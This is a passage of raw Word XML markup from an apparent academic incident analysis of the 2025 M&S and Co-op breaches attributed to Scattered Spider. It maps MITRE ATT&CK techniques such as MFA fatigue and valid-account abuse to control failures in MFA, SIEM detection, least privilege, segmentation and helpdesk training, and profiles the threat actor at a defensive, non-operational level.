          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="542AEA31" wp14:editId="0D672EFF">
            <wp:extent cx="4782217" cy="3515216"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="38079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791380" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4782217" cy="3515216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186EB7D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3004D681" w14:textId="7214D207" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.3 Critical Evaluation of TTP Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5E044" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Three observations merit critical analysis beyond surface-level mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A996809" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A38DC76" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">First, the centrality of T1621 (MFA Fatigue) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5488">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>challenges a widely held assumption that MFA deployment is sufficient protection against credential-based attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Grassi et al. [14] (NIST SP 800-63B) explicitly note that push-based MFA does not meet the phishing-resistance </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>requirements for high-assurance systems. The M&amp;S and Co-op incidents empirically validate this concern at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E87BD" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755A3493" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Second, the abuse of T1078 (Valid Accounts) as the primary persistence mechanism demonstrates a fundamental limitation of perimeter-based security models. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5488">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Once valid credentials are obtained, traditional network controls become largely ineffective</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a limitation that Zero Trust Architecture (ZTA) directly addresses by enforcing continuous verification regardless of credential validity [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FE038" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30697EB7" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Third, the dwell time implicit in T1046 (Network Scanning) and T1021 (Remote Services) indicates that anomaly detection systems — if present — failed to correlate low-and-slow indicators into actionable alerts. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5488">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This is consistent with findings from the Ponemon Institute [15], which reports a mean dwell time of 197 days for credential-based intrusions —</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> a figure that starkly illustrates the inadequacy of reactive detection strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2EF910" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5715B8B2" w14:textId="1FDFA3A4" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Root Cause Analysis and Security Control Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B755A" w14:textId="6A6C734E" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00F870C5" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D907896" wp14:editId="5347A074">
            <wp:extent cx="5731510" cy="3458210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1261072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72409" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3458210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB20518" w14:textId="43925CE6" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Technical Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A25E2" w14:textId="40A7432F" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1.1 MFA Implementation Deficiencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C49D5" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The deployment of push-based MFA — susceptible to T1621 fatigue attacks — represents a critical misconfiguration rather than an absence of controls. CISA's advisory AA23-271A [6] specifically warns against reliance on push-based authentication for privileged accounts, recommending FIDO2/WebAuthn as the minimum standard for high-risk environments. The failure to implement phishing-resistant MFA in high-value retail contexts constitutes a significant governance failure, particularly given that Scattered Spider's MFA exploitation had been publicly documented following the 2023 MGM attack [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51795E73" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3829352C" w14:textId="2106BD73" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1.2 Inadequate SIEM and Behavioural Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9B932" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Late-stage detection in both incidents implies that Security Information and Event Management (SIEM) systems lacked the correlation rules or User and Entity Behaviour Analytics (UEBA) capabilities to identify anomalous authentication patterns. Anomalies such as credential resets followed by unusual login times, geographic anomalies, or rapid privilege escalation should constitute high-fidelity alerts. The absence of effective detection suggests either inadequate log aggregation or insufficient tuning of detection rules — a finding consistent with NCSC's Cyber Security Breaches Survey [3], which identifies detection capability as the most significant gap in UK organisational security postures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64726F54" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1525E440" w14:textId="55AA9497" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Organisational and Governance Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B232F4" w14:textId="58A6CC5A" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2.1 Identity and Access Management (IAM) Deficiencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459B452" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Rapid privilege escalation (T1548) implies that the principle of least privilege was not consistently enforced. Excessive standing privileges — particularly for helpdesk staff empowered to reset credentials without multi-party authorisation — created the vulnerability that Scattered Spider exploited. This failure aligns with what Saltzer &amp; Schroeder [16] identify as the 'principle of least privilege' — a foundational security design principle that, when violated, enables exactly the kind of privilege abuse observed in these incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3067AD65" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1473BC0F" w14:textId="53C31881" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2.2 Absence of Network Micro-Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702400D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Lateral movement (T1021, T1046) across multiple network segments indicates insufficient micro-segmentation. A properly segmented network implementing Zero Trust principles would have constrained attacker movement to the initially compromised segment, significantly limiting the blast radius of the intrusion [9]. The failure to segment retail transaction systems from operational infrastructure is particularly notable, given that PCI DSS v4.0 [17] mandates network segmentation for environments handling payment card data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5FF9D4" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39002251" w14:textId="736F8397" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2.3 Human Factors and Security Culture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55315145" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The success of vishing attacks against helpdesk personnel reflects inadequate security awareness training, specifically around social engineering resistance. Research by Workman [18] demonstrates that security awareness training can reduce susceptibility to social engineering by up to 72% when applied consistently and tested through simulated phishing exercises. The apparent absence of such programmes — or their ineffectiveness — represents a systemic organisational failure rather than individual employee error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007A7B8" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BA2E03" w14:textId="75115ED9" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Threat Actor Profile: Scattered Spider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183FFB6" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Scattered Spider (CrowdStrike designation), also tracked as Octo Tempest (Microsoft), UNC3944 (Mandiant), and Muddled Libra (Palo Alto), is a financially motivated cybercriminal collective with a distinctive profile that sets it apart from nation-state and traditional ransomware actors [4][5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF59BB1" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C62C671" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Attribution confidence: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>High — based on consistency of TTPs with documented Scattered Spider campaigns (MGM 2023, Caesars 2023, M&amp;S/Co-op 2025) [4]. Attribution remains probabilistic but achieves the threshold of 'highly likely' under the Intelligence Community's confidence framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2463C188" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22044836" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Primary motivation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Financial — specifically extortion and data exfiltration for ransom, with operational disruption deployed as leverage to compel payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953163D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2388D4BD" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical analytical observation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Scattered Spider's threat model challenges conventional cybersecurity frameworks that prioritise technical controls over human-layer defences. Their effectiveness derives not from technical sophistication but from a deep understanding of organisational psychology and IT service desk processes — what Cialdini [19] identifies as 'authority' and 'urgency' social influence principles operationalised as an attack vector. This suggests that technical countermeasures alone are insufficient: organisational resilience requires a parallel investment in human-centred security culture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53562170" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4DAA2B" w14:textId="18EE8628" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Detection and Response Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0085FD5B" w14:textId="65DA3C8B" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00001946">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F553558" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Both M&amp;S and Co-op appear to have detected the intrusions at a late stage — likely during the Impact phase (T1486) or following significant operational disruption — rather than during Initial Access or Lateral Movement phases. This detection failure warrants critical examination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC4E07" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
